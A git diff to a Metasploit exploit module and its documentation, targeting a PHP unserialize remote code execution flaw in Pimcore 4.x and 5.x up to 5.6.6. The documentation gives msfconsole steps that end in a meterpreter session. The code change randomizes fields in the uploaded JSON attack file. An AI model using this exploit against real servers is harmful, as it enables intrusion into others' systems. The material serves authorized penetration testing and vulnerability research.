diff --git a/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md b/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md index 34ea61e352..a8755afffa 100644 --- a/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md +++ b/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md @@ -1,29 +1,30 @@ ## Description -This module exploits a PHP unserialize() in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability. +This module exploits a PHP (unserialize()) in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability. The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method make it possible to exploit the unserialize function when passing untrusted values in "data" parameter. -Tested on Pimcore 5.6.6, 5.6.5, 5.6.4, 5.6.3, 5.6.2, 5.6.1, 5.6.0, 5.5.4, 5.5.3, 5.5.2, 5.5.1, 5.4.4, 5.4.3, 5.4.2, 5.4.1, 5.4.0 with the Symfony unserialize payload +Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.6.6 with the Symfony unserialize payload. -Tested on Pimcore 4.6.5, 4.6.4, 4.6.3, 4.6.2, 4.6.1, 4.6.0, 4.5.0, 4.4.3, 4.4.2, 4.4.1, 4.4.0, 4.3.1, 4.3.0, 4.2.0, 4.1.3, 4.1.2, 4.1.1, 4.1.0, 4.0.1, 4.0.0 with the Zend unserialize payload +Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload. ## Vulnerable Application -Affecting Pimcore, version 5.x <= 5.6.6 and 4.x +Affecting Pimcore, version 5.x <= 5.6.6 and 4.x. ## Verification Steps -1. Setting up a working installation of Pimcore 4.x or 5.x -2. Start `msfconsole` -3. `use exploit/multi/http/pimcore_unserialize_rce` -4. `set RHOST ` -5. `set USERNAME ` -6. `set PASSWORD ` -7. `check` -8. You should see `The target service is running, but could not be validated.` -9. `exploit` -10. You should get a meterpreter session! +Set up a default installation of Pimcore 4.x or 5.x (e.g.: `composer create-project pimcore/skeleton my-project` for the 5.x branch) as described on [Pimcore Installation documentation](https://pimcore.com/docs/5.x/Development_Documentation/Getting_Started/Installation.html) then: + +1. Start `msfconsole` +2. `use exploit/multi/http/pimcore_unserialize_rce` +3. `set RHOST ` +4. `set USERNAME ` +5. `set PASSWORD ` +6. `check` +7. You should see `The target service is running, but could not be validated.` +8. `exploit` +9. You should get a meterpreter session! ## Options diff --git a/modules/exploits/multi/http/pimcore_unserialize_rce.rb b/modules/exploits/multi/http/pimcore_unserialize_rce.rb index 6c14806b76..6d1e8fd85b 100644 --- a/modules/exploits/multi/http/pimcore_unserialize_rce.rb +++ b/modules/exploits/multi/http/pimcore_unserialize_rce.rb @@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote def upload # JSON file payload - fpayload = "{\"customlayout\":[{\"creationDate\": \"1\", \"modificationDate\": \"2\", \"userOwner\": \"3\", \"userModification\": \"4\"}]}" + fpayload = "{\"customlayout\":[{\"creationDate\": \"#{rand(1..9)}\", \"modificationDate\": \"#{rand(1..9)}\", \"userOwner\": \"#{rand(1..9)}\", \"userModification\": \"#{rand(1..9)}\"}]}" # construct POST data data = Rex::MIME::Message.new data.add_part(fpayload, 'application/json', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")